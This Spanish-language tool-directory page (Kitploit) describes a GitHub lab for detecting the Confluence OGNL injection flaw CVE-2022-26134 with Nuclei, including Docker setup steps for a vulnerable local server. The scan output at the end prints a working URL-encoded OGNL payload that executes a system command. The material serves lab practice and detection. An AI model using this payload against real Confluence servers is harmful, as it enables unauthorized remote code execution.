Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26134-LAB — Detección de CVE-2022-26134 usando Nuclei | Kitploit
Herramientas/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

Detección de CVE-2022-26134 usando Nuclei

Ver Repositorio
31hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-26134-LAB

Confluence Server y Confluence Data Center incluyen una importante vulnerabilidad de ejecución remota de código no autenticada identificada como CVE-2022-26134, según un aviso de seguridad publicado por Atlassian el 2 de junio de 2022. La vulnerabilidad no estaba parcheada cuando se publicó el 2 de junio y estaba siendo explotada activamente. A partir del 3 de junio, tanto los parches como una solución temporal están disponibles.

Este repositorio está destinado únicamente a fines experimentales y educativos.

Dependencias

  • Docker
  • Nuclei

Entorno vulnerable de Confluence

Ejecutando el entorno vulnerable

root@kitploit:~
docker-compose up

Una vez iniciado, puede acceder al servidor de Confluence usando la siguiente dirección URL:

http://127.0.0.1:8090/

Configuración del servidor de Confluence

  1. La primera vez que visite el sitio, se le guiará a través de la configuración.
  2. No marque ninguna casilla y seleccione "Next" en la página "Get apps".
  3. En la página de clave de licencia, haga clic en el enlace que dice "Get an evaluation license".
  4. Será redirigido a my.atlassian.com. Asegúrese de que el tipo de licencia seleccionado sea Confluence (Data Center). Escriba el nombre de organización que desee. Asegúrese de que el botón de opción para "Your instance is" esté seleccionado como "up and running". Una vez que haya verificado estos detalles, haga clic en el botón "Generate License".
  5. Aparecerá un modal de confirmación preguntando si desea instalarlo en el servidor: 127.0.0.1. Seleccione "Yes".
  6. Seleccionar "Yes" completará automáticamente la clave de licencia en su instancia local de Confluence. Seleccione "Next".
  7. Elija el tipo de implementación "Standalone" y seleccione "Next".
  8. En la página para configurar su base de datos, los detalles deben completarse de la siguiente manera:
    • Tipo de base de datos: PostgreSQL
    • Tipo de configuración: Simple
    • Nombre de host: db
    • Puerto: 5432
    • Nombre de la base de datos: confluence
    • Usuario: confluence
    • Contraseña: 123456789
  9. Después de completar estos campos, presione el botón "Test connection". Debería recibir el mensaje "Success! Database connected successfully". Luego haga clic en "Next".
  10. Comenzará a configurar su base de datos. Esto puede tomar un tiempo. Tenga paciencia.
  11. Una vez que la configuración de la base de datos esté completa, estará en la página "Load Content". Seleccione el botón "Example Site".
  12. A continuación, en la página "Configure User Management", seleccione "Manage users and groups with Confluence".
  13. A continuación, en la página "Configure System Administrator Account", cree una cuenta y seleccione "Next".
  14. Una vez completado, verá que la configuración fue exitosa. Presione "Start".
  15. Le pedirá que "Create a space to store your work". Introduzca cualquier nombre de espacio que desee.
  16. Omita el tutorial.
  17. Ahora ha completado la configuración de evaluación de Confluence Server.

Detección de CVE-2022-26134

La vulnerabilidad es una vulnerabilidad de inyección OGNL que afecta al servidor HTTP. La carga útil OGNL se coloca en el URI de una solicitud HTTP. Parece funcionar cualquier tipo de método HTTP, ya sea válido (GET, POST, PUT, etc.) o inválido (p. ej., “BALH”).

https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

Uso de Nuclei

Ejecute el siguiente comando de Nuclei:

root@kitploit:~
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml

Salida del escaneo

root@kitploit:~
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
Descargar herramienta